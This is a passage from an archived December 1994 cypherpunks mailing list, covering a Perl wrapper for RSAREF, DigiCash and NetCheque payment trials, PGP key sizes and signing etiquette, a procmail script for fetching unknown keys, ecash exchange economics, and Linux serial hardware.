4, and a classic or gcc compiler. Hal Finney writes: >[Part about remailers deleted] Deleted? That was my main point! What do you think of this remailer design? >>For something complex like this, we need a language with a little more >>leverage than C provides. For this and other complex protocols, I've ported >>RSAREF 2.0 to Perl. The interface does not require you to recompile Perl. >>It uses a C daemon and pipes. It provides symmetric encryption, public-key >>encryption, digital signatures, hashing, DH exchange, and ASCII armor. >>The algorithms used are MD5, MD2, DES, DESX, triple-DES, RSA, and DH. >>It has a good (eval/die) exception handling mechanism, and a very thorough >>regression testing script. >>[...] >>I want to add other algorithms to the Perl encryption package. The secret >>sharing, for one. A one-function call to gzip for compression. A blind >>signature if I could get patent permission (not from Chaum; how's Brands?) >>or perhaps just do it with a "research purposes only" disclaimer. Someone >>with Visual Basic experience could do a DOS/Windows VBX module to enable >>easy writing of PC clients for neat net-based servers written with the Perl >>encryption package. >This is very exciting! Could you show some examples of how your code >would be used with Perl? Some kind of script that could work with MP >numbers or RSA decrypt a file? It would be very good to have a >prototyping language like Perl with crypto addons. I put some examples from the manual at the end of this message, as they are fairly long compared to the rest of the message. Essentially it does everything documented in "rsaref.txt". >>Code for secret sharing is available, but most secret-sharing algorithms >>create shadows each the size of the message. This can be avoided: use an >>error correcting code to add enough information to the original so the >>message can be recreated with any m of n pieces. Break into pieces, encrypt >>each piece, and secret-share the key. Where can I get an error correction >>algorithm that can do this? You should be able to increase a file's size by >>50% and then have any two of three pieces recreate it, for example. >Try looking for a package called Shade using Archie. Here is an excerpt >from the doc file: >>`shade' is a file splitting and merging utility. It takes a large >>file and splits it into uniformly sized blocks. It can also output >>extra blocks (called shadows). These shadows can be used to recover >>missing sections if they get corrupted or it they are lost. With a >>single shadow, `shade' can recover ANY single missing block. As many >>shadows are needed as there are blocks missing. If too few blocks >>and shadows are available, nothing can be recovered. >> >>For example, foo.bar (259042 bytes) is split into 5 sections >>of 45000 bytes, 1 section of 34042 bytes and 2 shadows of >>45000 bytes. Each of these 8 parts is sent through email. >>Even if any two of these eight parts gets lost, the original >>foo.bar can be reconstructed. >> >>`shade' is a simple application of the chinese remainder theorem >>for polynomials with coeficients modulo two. For more information >>see the comments at the beginning of project.c. Ok, I will get this file. Looks like what I wanted. >As for the remailer return address idea, I would suggest looking at >Chaum's 1981 paper from CACM which has a similar concept. I believe it >was posted here recently. Instead of using shared secrets he had the >secret key at each hop get embedded in the return address itself. My database system (grep) picked up the article, posted Oct 14 anonymously. Looks like Chaum just has the remailer keep track of sent messages and refuse to process them again. This does not protect you if the remailer is coerced or hacked. There is still enough persistent information available to catch you. Is there a good way to establish a shared secret untraceably? ---- Applying a chainsaw to the RSAREF for Perl user manual: You have two files: rsaref.pl and rsarefd. Rsarefd is a C program, and rsaref.pl is a perl package you "require" to use it. ... The functions available are: Message digest (secure hashing) algorithms MD5 and MD2 Symmetric encryption algorithms DES, DESX, and Triple-DES in CBC mode ASCII encoding and decoding of binary strings according to RFC 1421 Public-key encryption with RSA and DES, DESX, or Triple-DES in CBC mode Digital signatures with RSA and MD5 or MD2 Generation of RSA keys (up to 1024 bits) for the above Diffie-Hellman key agreement (up to 1024 bits) Generation of Diffie-Hellman parameters for the above ... The included Perl script "rsaref_test" will test all of the interface functions, and generate all of the exceptions to make sure they are handled correctly. It also checks the daemon for memory leaks. If rsarefd has been compiled in the current directory and rsaref.pl is available, running "rsaref_test" should run it. ... Exception handling is done with the Perl eval/die mechanism. The individual error codes are listed along with the function descriptions. The error code will be returned in $@ as an ASCII string if the eval fails. ... require 'rsaref.pl'; &rsaref'start_daemon($daemon_location); # starts rsarefd &rsaref'end_daemon; # ends rsarefd $digest=&rsaref'digest($data,$digestAlgorithm); # take a message digest $digestAlgorithm is one of the defined constants "$rsaref'DA_MD2" or "$rsaref'DA_MD5". An "RE_DIGEST_ALGORITHM" will be raised if $digestAlgorithm is invalid. $output=&rsaref'cipher($input,$key,$iv,$function,$algorithm); Encrypts or decrypts a string using a symmetric encryption algorithm. $function is one of "$rsaref'CM_ENCRYPT" or "$rsaref'CM_DECRYPT". $algorithm is one of $rsaref'EA_DES_CBC, $rsaref'EA_DESX_CBC, $rsaref'EA_DES_EDE3_CBC or $rsaref'EA_DES_EDE2_CBC. If $algorithm or $function is invalid, the function raises an "RE_ENCRYPTION_ALGORITHM" exception. If $key is larger than 24 bytes or $iv is not 8 bytes long, the function raises a "RE_KEY" exception. $asciiText=&rsaref'encodePEMblock($binaryData); $binaryData=&rsaref'decodePEMblock($asciiText); These two functions are used to move binary data, such as ciphertext and keys, via Email and other non-eight-bit-clean channels. They are similar to (but not compatible with) uuencode. The method is detailed in RFC 1421. encodePEMblock does not raise any exceptions. decodePEMblock will raise an "RE_ENCODING" if the input is invalid. $bytes=&rsaref'getRandomBytesNeeded; &rsaref'randomUpdate($randomBytes); # setup random numbers @private_key=&rsaref'generatePEMkeys($bits,$useFermat4); @public_key=@private_key[0..2]; This function is used to generate RSA public and private keys for digital signatures and public-key encryption ("envelopes" or "sealing".) $bits specifies the key length from 508 to 1024 bits. $useFermat4 chooses the public exponent; if it is 0, the exponent is 3; if it is 1, the exponent is 65537. The returned @private_key is actually: ($bits,$modulus,$publicExponent,$privateExponent,$prime1,$prime2, $primeExponent1,$primeExponent2,$coefficient) By taking only the first three, you get a public key: ($bits,$modulus,$publicExponent) This function raises an "RE_NEED_RANDOM" if you did not initialize the random-number generator. If your key length is out of range, it raises an "RE_MODULUS_LEN" exception. $signature=&rsaref'sign($data,$digestAlgorithm, at privateKey); This function raises an "RE_DIGEST_ALGORITHM" exception if $digestAlgorithm is invalid, or an "RE_PRIVATE_KEY" if @private_key is invalid. &rsaref'verify($data,$digestAlgorithm,$signature, at publicKey); Verify returns no value. If it completes successfully, the signature is valid. If the signature is invalid, Verify raises an "RE_SIGNATURE" exception. Verify returns an "RE_LEN" if the signature is the wrong length, and an "RE_PUBLIC_KEY" if the public key cannot decrypt the signature. This means the public key or the signature is corrupted. ($encryptedMessage,$iv, at encryptedKeys)= &rsaref'seal($message,$encryptionAlgorithm, at publicKeys); This function seals (public-key encrypts) a message. The same message can be encrypted for multiple recipients. The message is only encrypted once; then the session key is encrypted with each recipient's public key. @publicKeys are one or more public keys. For each public key you provide, you will get back one encryptedKey. Each encryptedKey can decrypt the message using the private key corresponding to the public key used to encrypt it. Seal raises an "RE_ENCRYPTION_ALGORITHM" exception if $encryptionAlgorithm is invalid, an "RE_PUBLIC_KEY" if the public key is invalid, and an "RE_NEED_RANDOM" if the random-number generator is not initialized. $message=&rsaref'open($encryptedMessage,$iv,$encryptionAlgorithm, $encryptedKey, at privateKey); This function opens (decrypts) a sealed message using a private key. $encryptedMessage is the output from the seal operation. Open raises an RE_LEN exception if the encryptedKey size is out of range, RE_ENCRYPTION_ALGORITHM if the encryptionAlgorithm is invalid, RE_PRIVATE_KEY if the private key cannot decrypt the encryptedKey, and RE_KEY if the symmetric key cannot decrypt the message. ($prime,$generator)= &rsaref'generateDHparams($primeBits,$subPrimeBits); This function generates a new prime and generator for Diffie-Hellman exchange. $primeBits is the length of the DH modulus (prime), and $subPrimeBits is the order of the generator. $subPrimeBits can be somewhat smaller than $primeBits without compromising security, and this makes the exchange go faster. The dhdemo included with RSAREF uses a 512-bit prime and 160-bit subprime, for example. The function returns RE_MODULUS_LEN if the prime length is invalid, and RE_NEED_RANDOM if the random generator is not initialized. ($publicValue,$privateValue)= &rsaref'setupDHagreement($prime,$generator,$privateValueLen); This function raises an RE_NEED_RANDOM exception if the random number generator is not initialized. $agreedKey=&rsaref'computeDHagreedKey($prime,$generator, $privateValue,$otherPublicValue); This function raises an RE_DATA exception if the otherPublicValue is longer than the prime. From jamesd at netcom.com Sun Dec 4 15:56:09 1994 From: jamesd at netcom.com (James A. Donald) Date: Sun, 4 Dec 94 15:56:09 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412040223.UAA00225@omaha.omaha.com> Message-ID: <199412042340.PAA23394@netcom8.netcom.com> Alex Strasheim writes > Unless Digicash has significant problems with banks or governments that I > don't know about (always a possibility), the things I've heard about the > beta test make me believe that a functional transaction system from that > company will probably be released. It seems that some bankers are pissed at Digicash, for reasons very similar to the reasons that some cypherpunks are pissed at Digicash. As I said earlier, ninety percent of success is turning up. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at acm.org From rah at shipwright.com Sun Dec 4 16:01:57 1994 From: rah at shipwright.com (Robert Hettinga) Date: Sun, 4 Dec 94 16:01:57 PST Subject: e$ spam: Announcing availability of NetCheque Message-ID: <199412050001.TAA09886@zork.tiac.net> I remember c'punks laughing about the last Kerberos-based transaction I heard about, the Gopher billing server at CMU, but I can't remember why... Cheers, Bob Hettinga >From: bcn at ISI.EDU >Date: Sat, 3 Dec 1994 17:20:03 -0800 >Posted-Date: Sat, 3 Dec 1994 17:20:03 -0800 >Original-From: Clifford Neuman >To: www-buyinfo at allegra.att.com, kerberos at mit.edu >Subject: Announcing availability of NetCheque >X-UIDL: 786585323.000 > >NetCheque(TM) is an electronic payment system for the Internet >developed at the Information Sciences Institute of the University of >Southern California. Users registered with NetCheque accounting >servers are able to write checks to other users. When deposited, the >check authorize the transfer of funds from one account to another. >NetCheque uses Kerberos to protect electronic checks. > >A binary NetCheque release is available for Sun4 systems running SunOS. >A source release, and binary releases for other architectures will be >available within several weeks. > >To write checks or deposit checks you will require a a NetCheque >account. Eventually, there will be many accounting servers from which >you can obtain an account, but in the early stages of the trial, there >is only one. You must fill out the account application, which may be >obtained by sending an e-mail request to NetCheque at isi.edu. > >Though we can grant NetCheque accounts to anyone that requests one, >because the software uses encryption to protect the checks we regret >that we will not be able to send the software itself to users outside >the United States. Users in the United States may retrieve the >software from prospero.isi.edu in the directory /pub/netcheque/distribution. > >Additional information on NetCheque can be found through our home >page: > > http://nii-server.isi.edu/info/NetCheque/ > >Payments using NetCheque originate from named user accounts, providing >no anonymity. We are also working on an electronic currency system >called NetCash to support weakly anonymous payments. The NetCash >system was described in a paper in the 1993 ACM Conference on Computer >and Communications security, available through our home page. > >Clifford Neuman >Gennady (Ari) Medvinsky > > ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From warlord at MIT.EDU Sun Dec 4 16:04:09 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Sun, 4 Dec 94 16:04:09 PST Subject: 2048-bit keys?? In-Reply-To: <199412042331.PAA14197@jobe.shell.portal.com> Message-ID: <9412050004.AA21905@pickled-herring.MIT.EDU> > just curious, how many random bytes does it take to generate these > fuckers and can the keyservers out their handle em yet? Well, it needs about 2048 bits of randomness, I would guess. It depends on how many bits/keystroke you can get on your machine... As for the keyservers, well, I know that mine (pgp.mit.edu) can. I should let you know that there is a small buglet in PGP 2.6.2 that will not allow you to generate 2048-bit keys. It limits you to 2047 bits (there is a piece of code that leaves that one extra bit up there -- oops). This shouldn't affect anything, except people will only get 2047 bits instead of 2048, but I personally do not consider this a problem. -derek From M.Gream at uts.EDU.AU Sun Dec 4 16:42:55 1994 From: M.Gream at uts.EDU.AU (Matthew Gream) Date: Sun, 4 Dec 94 16:42:55 PST Subject: gambling machines In-Reply-To: <199412042331.RAA10196@pentagon.io.com> Message-ID: <199412050040.AA03362@sequoia.itd.uts.EDU.AU> `Jim McCoy' wrote: > > For people with beta digicash clients, try http://gamezone.io.com/ > > IAs far as a real system goes, you will never see on running on a machine > in the US in the near future; in addition to the regulatory BS involved in > making magic money useful you would run into all kinds of wonderful > gambling laws and regulation. > To exercise my ecash software I had a few goes at this and found at least one problem; payments not honoured. In ten games I obtained two four of a kinds, the first on a 0.25 bet which should have resulted in a payment of 6.25. No payment as received. The second time it was on a wager of 1.00, --> You have won! Your final hand was a Four of a Kind. The winnings for this hand was $25. This sum is being deposited in your CyberWallet right now. <-- again --- no payment received. Admittedly, four other small payments succeeded, with values of less than and equal to 2.00 (for two of a kinds and so on). I assume this is caused by some kind of bug, not any deception on behalf of the operator; but it does illustrate a potental problem as I really don't have any `proof' with which to challenge. Not that I'm worried; it being a beta and all that. But one would expect a `real' system to provide better assurances (wrt. payments being honoured and guaranteed rates of return). Clearly we're experimenting here. mg. -- Matthew Gream (sw/hw engineer) +61 (02) 821-2043 From werewolf at io.org Sun Dec 4 16:46:45 1994 From: werewolf at io.org (Mark Terka) Date: Sun, 4 Dec 94 16:46:45 PST Subject: 2048-bit keys?? In-Reply-To: <199412042331.PAA14197@jobe.shell.portal.com> Message-ID: On Sun, 4 Dec 1994 anonymous-remailer at shell.portal.com wrote: > just curious, how many random bytes does it take to generate these > fuckers and can the keyservers out their handle em yet? > Well, when I generated my key today, it asked for 1115 random keystrokes and the overall generation took a good 20-25 minutes on my 486-33. As for the keyservers, I'm not sure why they wouldn't handle them. Afterall, I had a non-standard key before and they handled that, bak in the v 2.3a days. -------------------------------------------------------------------------- Mark Terka | werewolf at io.org | public key (werewolf) by Toronto,Canada | dg507 at cleveland.freenet.edu | public key server or request --------------------------------------------------------------------------- From db at Tadpole.COM Sun Dec 4 17:18:03 1994 From: db at Tadpole.COM (Doug Barnes) Date: Sun, 4 Dec 94 17:18:03 PST Subject: gambling machines In-Reply-To: <199412050040.AA03362@sequoia.itd.uts.EDU.AU> Message-ID: <9412050117.AA15654@tadpole> The underlying problem is that in the DigiCash system money goes through the shop into the bank, but there is currently no automatic way for a shop to withdraw money (we might be able to hack one on top of the text client, but haven't gotten around to it). So, what happens, is that the shop runs out of cash (or out of the right size coins), even though it has a good-size bank balance. We've been trying to stay "cashed up", but interest in the poker game has been sporadic. You are absolutely correct that various steps would need to be taken in terms of error handling and dispute resolution if the e-cash was out of beta. We are currently nicely cashed up, please try it again and see if it is still not paying out (I'm stuck in a text-only environment at the moment.) Please send any error reports to me at: dab at tadpole.com > > To exercise my ecash software I had a few goes at this and found at > least one problem; payments not honoured. In ten games I obtained two > four of a kinds, the first on a 0.25 bet which should have resulted in > a payment of 6.25. No payment as received. The second time it was on a > wager of 1.00, > > --> > You have won! > > Your final hand was a Four of a Kind. The winnings for this hand was > $25. This sum is being deposited in your CyberWallet right now. > <-- > > again --- no payment received. Admittedly, four other small payments > succeeded, with values of less than and equal to 2.00 (for two of a > kinds and so on). I assume this is caused by some kind of bug, not any > deception on behalf of the operator; but it does illustrate a potental > problem as I really don't have any `proof' with which to challenge. > > Not that I'm worried; it being a beta and all that. But one would > expect a `real' system to provide better assurances (wrt. payments > being honoured and guaranteed rates of return). Clearly we're > experimenting here. > > From mccoy at io.com Sun Dec 4 17:24:55 1994 From: mccoy at io.com (Jim McCoy) Date: Sun, 4 Dec 94 17:24:55 PST Subject: gambling machines In-Reply-To: <199412050040.AA03362@sequoia.itd.uts.EDU.AU> Message-ID: <199412050124.TAA20338@pentagon.io.com> > From: M.Gream at uts.EDU.AU (Matthew Gream) > > `Jim McCoy' wrote: [regarding online gambling] > > For people with beta digicash clients, try http://gamezone.io.com/ > > To exercise my ecash software I had a few goes at this and found at > least one problem; payments not honoured. [...winning hands not paying > out...] Admittedly, four other small payments > succeeded, with values of less than and equal to 2.00 (for two of a > kinds and so on). This is basically caused by the lack of a to-be-implemented-RSN (tm) part of the ecash server: the ability to have have a merchant "wallet" maintain a set balance of coins in the wallet. What happens is that every time money is given to the merchant to play a game it gets directly deposited into the bank, payoffs for winning hands come out of the wallet. Eventually the wallet runs out of coins to make the payment but there is no automatic way to keep it supplied from the coins that are deposited to play. The DigiCash user clients seem fairly well developed, but they are lagging behind on the server-side of things (both merchant servers, and the bank server.) > I assume this is caused by some kind of bug, not any > deception on behalf of the operator; but it does illustrate a potental > problem as I really don't have any `proof' with which to challenge. Well, at some point we need to finish up some of the reliability code. It should present you with a "receipt" number during payoff that will be linked to the game database, the game is not removed from the database until the money exchange clears so if there is a problem the user can present the number and we can look up the game results. jim From skaplin at skypoint.com Sun Dec 4 18:42:26 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Sun, 4 Dec 94 18:42:26 PST Subject: Well now that we're signing... Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Well folks, now that more people are signing messages, how about every once and a while posting your key? It's kind of a drag having to hit the keyservers. Sam - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAy795M4AAAEH/3K4WyZywwdndt0e1ZZ3jeOdsICCcQzZIP+N67VVyp6AukW4 kADHzSv2W6nbLjT5qQ6c21BQnFUv7AvX6BIHh1BOndu/DRo3MeFD0LkxK5IafSrs LT7wzg1YQI/nSJ7MZ6kZ4m8XnYUKNwcM9F/OHz22/IV59qwL+5+bTeOvuvFW+kjy MCI6FlBQXCZN3FZw5zlEy8+lEudJiRzr9zT1wa6MV0xpYNNCAR2EOVxJ2b7eHn8J eSNQhVCoeSgdBN0P5CiI0E1tYlAKHemzKHdJJ+ssTaQ8OT282oJw2IiOc4mXeLa+ 83ws1B14gUMAmEzQJDzncbOFe0uFyWdfEFFKB80ABRG0JFNhbXVlbCBLYXBsaW4g PHNrYXBsaW5Ac2t5cG9pbnQuY29tPokAlQMFEC795V0KZ4pnlgH9xQEBUOYD/2/l fzxUAMQIiTjDJs6QljOyeRDXtl7roKlN9zA5h5szBx/ivpd0zRRrMiW8vGgetfVF bPR/uMudQuq3iQhAnrbZoi0tg+2rQ7sgj/bj9bqPgNxi+aAEUjMhJED1gB3F/R2a ww6BhETsIHg/gCNr5lX/h0WIEk1FXYHfCr9CPA5k =2L++ - -----END PGP PUBLIC KEY BLOCK----- ============================================================================== A Vulcan can no sooner be disloyal than he can exist without breathing. -- Kirk, "The Menagerie", stardate 3012.4 ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLuJ87MlnXxBRSgfNAQE73gf/Q0AnDAXFDGHgfIxYSgxakktPynYigi4k 7A/PI7csf0nzAJRpxTNR5Dqrz1hlhL8qTEqT6GgIKymOe17m62V4Cs6E0Poampv5 jjGT5oJ+mH6Mr0v2/95xO/Rb8TBXZxBuaog+qF6ycBODSScla9q/PIZQ5OhDnj9K AvDE8REz5vFylk0Srmv/4wrgD4oW3zX7MFL3ZQd7zUOu/z8EWtvzyxVDfcrLIng3 YscOhFG+QgjchAGvvHTXiLmPIo+r5I4RmIKWgz9sRPGv/ps5IC21LqBKwizS1/xP PGvJn8/NCfhXGGF0v1jw4dOYAvldKQtJ+H9fBkaJwbSVSjxjTuhfsQ== =dtCE -----END PGP SIGNATURE----- This message digitally signed to verify the identity of the writer. From warlord at MIT.EDU Sun Dec 4 18:59:56 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Sun, 4 Dec 94 18:59:56 PST Subject: Well now that we're signing... In-Reply-To: Message-ID: <9412050259.AA26790@bill-the-cat.MIT.EDU> > Well folks, now that more people are signing messages, how about every once > and a while posting your key? It's kind of a drag having to hit the > keyservers. i disagree. thats exactly what the keyservers are for! there is absolutely no reason to flood mailboxes with your key, especially when anyone who is really interested in verifying your signature can get your get from the keyserver _once_, which is all that is necessary. if i already have your key, i dont _want_ to see it again! -derek From stein-c at eng.buffalo.edu Sun Dec 4 19:37:59 1994 From: stein-c at eng.buffalo.edu (Craig Steinberger) Date: Sun, 4 Dec 94 19:37:59 PST Subject: Well now that we're signing... Message-ID: <13848.786598675@cfd20.eng.buffalo.edu> A non-text attachment was scrubbed... Name: not available Type: text/x-pgp Size: 1096 bytes Desc: not available URL: From merriman at metronet.com Sun Dec 4 20:05:03 1994 From: merriman at metronet.com (David K. Merriman) Date: Sun, 4 Dec 94 20:05:03 PST Subject: Well now that we're signing... Message-ID: <199412050405.AA03984@metronet.com> -----BEGIN PGP SIGNED MESSAGE----- >Something I was wondering about is what should be done with >signatures that don't check out. For the most part it is due to a >bug in the signing/mailing procedure, rather than an actual spoof. >Is there an ettiquette for contacting the person who posted the >missigned message. Do people want to know if their sigs didn't >check out? > >- -Craig Well, *I'd* sure want to know.... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuKQ5cVrTvyYOzAZAQEmygP/TlT8Ivg+hh215OOVehERh14esJJBEaHI iUhA22DzjHu/IHqyLusixNSC5M7fQBiImlb1vt34HHfi6NQTSsOEjolndHv0oKtZ Yausr209SVvt8w9GoXlWORiIWpIfNlps588bvNX9mKWt/RO8a6SPipEYe3PnsecO 0gDwh0wF0pg= =WncG -----END PGP SIGNATURE----- - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at feenix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From alex at omaha.com Sun Dec 4 20:30:18 1994 From: alex at omaha.com (Alex Strasheim) Date: Sun, 4 Dec 94 20:30:18 PST Subject: backing ecash Message-ID: <199412050431.WAA00176@omaha.omaha.com> -----BEGIN PGP SIGNED MESSAGE----- [Standard disclaimer: all of this may be based on some misunderstanding of the underlying situation on my part.] I've been thinking about what Eric and others have written about the apparent problems Digicash is having hooking up with financial partners. I agree that it would be encouraging if some large banks or a credit card company were on board, but I'm not sure their absence is as big of a problem for a digital currency system like Digicash as it would be for other types of systems. If a transaction system uses credit card numbers to process purchases, then you need to have either a credit card company that's willing to participate, or someone with a merchant account to submit purchases to the system. Obviously, if the credit card company doesn't want to allow the online system, they can prevent people with merchant accounts from participating, so it's important to have them onboard. But digital currency is a commodity, or at least an incredibly lifelike simulation of one. If someone's willing to make a market for it, it will have value, assuming the system's secure and the mint behaves responsibly. Suppose Digicash opened up a digital currency exchange in Amsterdam. They agree to make a market in edollars. Specifically, they agree to sell edollars for $1US, and they agree to buy edollars for $0.99. This prices are good for all time, for all comers. The promise to sell is easy to keep, because they can mint as many edollars as they want. The promise to buy is backed up by cash reserves, which they create with revenues from sales. Let's suppose, just for the sake of argument, that the currency exchange doesn't even conduct business over the net. You have to walk into a storefront in Amsterdam with a floppy disk to buy or sell edollars. Edollars would still have value here in Lincoln, NE USA. I could find a partner and set up a local currency exchange here in Lincoln; my partner would set up shop in Amsterdam. We'd offer to sell edollars for $1.01 and buy them for $0.98. We'd keep reserves of both edollars and US dollars on hand, from which we'd do our trading. If we started to run low on edollars, my partner would go to the storefront and buy some more. If we started to accumulate too many, he'd sell. The prices are set up so that we'd always make a profit, assuming our volume was high enough to cover expenses. Now suppose that Bob, who runs a local business here in town, wants to sell widgets over the net. He decides to use digicash software. Alice lives in Hoboken, and she wants to buy a widget. She goes to a digital currency exchange in Hoboken and buys some edollars, and then she uses her digicash client to transfer the funds to Bob at Widgets 'R Us. Every day, Bob goes to the bank and deposits the day's checks at the drive through window. Once he started selling online, he stops at my drive through window every day on the way to the bank. He gives me the edollars, and I give him a check. Then he deposits my check along with all the others at the bank. If my check is good, the bank can't say much about things one way or another. You don't need Visa or Citibank or anyone else onboard. They're not part of the loop. You just (just?) need the government to agree to stay out of the way. Now obviously, things would work a lot more smoothly if you didn't need me or my digital currency exchange. It would be nice if Bob and Alice could buy and sell edollars from their banks online. But it's not essential. I could extend credit to Alice so that she could buy edollars from me online, without having to go out and physically buy them. If Bob and I have been doing business for a while, maybe he'll trust that I'll mail him a check after he transfers edollars to me online. I suspect that if I started to make money, banks would decide to put people like me out of the business by moving into it themselves. It seems to me that one of the main strenghts of the digicash system is that it can take off slowly as more and more people decide to use it. It doesn't need to be embraced by anyone except the regulators. If it's cheaper and provides a better service, it will win. == Alex Strasheim | finger astrashe at nyx.cs.du.edu alex at omaha.com | for my PGP 2.6.1. public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuKXVBEpP7+baaPtAQEaLwP+K0MU9agIOaLb9SI9Bwv9732P5ltsdeJ5 45z2IUPzOPRJn/o+ivXJv7sjP1hIlTXMKjA2Q0Lpy2gplDIa8/cqz9WmqSku837o nJc13tdsJevfNjtEUztC1kfrTsrZjwxW2L+hg0uL9GJSxFhU6G+eKqsXYH5nlEFZ b1w2wFbzf5c= =4/Jz -----END PGP SIGNATURE----- From adam at bwh.harvard.edu Sun Dec 4 21:53:58 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Sun, 4 Dec 94 21:53:58 PST Subject: Well now that we're signing... In-Reply-To: Message-ID: <199412050553.AAA25066@bwh.harvard.edu> You wrote: | -----BEGIN PGP SIGNED MESSAGE----- | | | Well folks, now that more people are signing messages, how about every once | and a while posting your key? It's kind of a drag having to hit the | keyservers. Especially when your key isn't on the servers. The following procmail rules & shell script automatically request keys for messages that come in signed where you don't have the key. Doesn't address multiple keyrings. Do what you want with the returns, I dump 'em into a folder to look at now and again. You might pipe them to pgp -fka or somesuch. Adam ----procmailrc-------- # auto key retreival :0BW * -----BEGIN PGP KEYID=|/usr3/adam/tmp/unknown # I have an elm alias, pgp, points to a keyserver :0ac |elm -s"get $KEYID" pgp ----~/tmp/unknown------ #!/bin/sh # $output is to get the exit status. Othierwise, this would be a one liner. OUTPUT=`pgp -f +VERBOSE=0 +batchmode -o /dev/null` echo $OUTPUT | egrep -s 'not found in file' EV=$? if [ $EV -eq 0 ]; then echo $OUTPUT | awk '{print $6}' fi exit $EV -- "It is seldom that liberty of any kind is lost all at once." -Hume From 0003701548 at mcimail.com Sun Dec 4 22:21:46 1994 From: 0003701548 at mcimail.com (Alan Pugh) Date: Sun, 4 Dec 94 22:21:46 PST Subject: autosign designs Message-ID: <73941205062037/0003701548PJ3EM@MCIMAIL.COM> -----BEGIN PGP SIGNED MESSAGE----- >The point is that if Eric insists on arbitrary rules that >threaten the list, some bright c'punk will "write code" to circumvent >the assinine rule. Use technology to solve problems... TM> Not exactly; that's how the thought train began, but something that was TM> just for circumventing the rule would have a slightly different solution: TM> generate a new key for each post, sign with the key, and throw it away TM> (so that no information would be contained in the signature). The TM> signatures from the current system does contain some information. TM> I might yet still implement something that does the above: at this point, TM> it's pretty trivial, aside from hacking PGP to generate a key with a smaller TM> than 384-bit modulus (to conserve computrons). You might also want to check for low computron usage if you can and generate a bunch of keys for later use when the machine is fairly idle. (if it's ever in such a state - don't know if you are on a multiuser system or not). that way, during peak times, you aren't burning big-time cycles generating keys. TM> As an aside, this is my general approach to things: I'll start off in TM> a particular direction and then vary it as I think of new things. I TM> only mention it here because I often state that I'm going to do something TM> and then the result is somewhat different than my original summary. TM> I've done this a couple times here, and I'm hoping that explaining this TM> will make me appear, well, less flakey. the above is how i code. of course, i'm not a professional - just having a good time. =snip= amp <0003701548 at mcimail.com> December 5, 1995 1:4 -----BEGIN PGP SIGNATURE----- Version: 2.61 iQEVAwUBMMO2/ygP1O9KJoPBAQF6Ggf8CG6vLPnxKLB0LKa8rwq9exCvju1HJled xzovmn+nb3XqyRVllrwhSdSWTVaQrFbT0tv+9HxZRUC/vywp3b+qA4cY338vqZMo KdP7vi6MtFNFNUCk9uiYesoi0jC5bB2Nzraxx0ETwulCR31QP/MRtT/s3asoNU+/ MCCydAIbcPFGjjNAoFvsJLdpNJjhT4yWkSv4NcnhnzbqqKgo/ZvrzRczZUnKGPTT BrIBn5DJ4juJn0FUCd3GSFhNGnVnDFewFpQe9Rkpr6Pk1uyLou5FjXwhFx7iAJHV 9DApIJqkmYe583cPsCuKZyHA87mgfcNlp4L785GWks56+hFQ4TygAQ== =xNlv -----END PGP SIGNATURE----- From jcorgan at netcom.com Sun Dec 4 22:33:41 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Sun, 4 Dec 94 22:33:41 PST Subject: Oceania? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I had come across a reference to this in Tim's CYPHERNOMICON. Was this whole project a giant scam? Has this been objectively demonstrated, or just suspected/believed? Having read the new URL this group has placed onto the Web (don't have it handy or I'd post it), it seems that the project is still alive and well, and "trying to pay off old debts." Could someone bring me up to speed on this group? On the surface, it would seem that there is a lot in common with their objectives and the general Cypherpunks "philosophy". (quotes because I understand the diversity of thought in this group.) ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLv0KHk1Diok8GKihAQGPhAQAuXzxcDNpKv6fqW3P0FAQCeRkskuO1uAk /pbyQjbPWagHjEiwY845zWPNoRZVZyTEN5eWjYLJYCsTDZ+ymNSDTI8+It5tENyv Ee2CZIFadoGgo6loLLH3TqYn6S/BogwEVGAzFbbHH2echlNCOJdmxbCCfxR+r8hA TayG8nQQHzQ= =Yu4/ -----END PGP SIGNATURE----- From crawford at scruznet.com Sun Dec 4 23:41:17 1994 From: crawford at scruznet.com (Michael D. Crawford) Date: Sun, 4 Dec 94 23:41:17 PST Subject: Info about Linux Message-ID: <199412050740.XAA09108@scruz.net> Matt Bartley writes > Michael D. Crawford writes >> ...a serial card with a 16 >> character buffer that works just fine is available quite cheaply. > >Which card is this? My hacked-together clone currently has a 16550A >card. I have had lots of RS232 problems. For example, my mouse on >com1: doesn't seem to work in Linux's (gpm/selection). I don't want to recommend a particular card until I've tried one myself. I'm using the old fashioned one-character-buffer card. I will ask a friend who has had some success. Selection doesn't work at all unless you have the 1.1.something kernel or later. The 1.0 kernel that ships with Yggdrasil doesn't support selection. The "even" numbered kernels are regarded as stable release for regular people to use. The "odd" releases, 1.1.x, are development 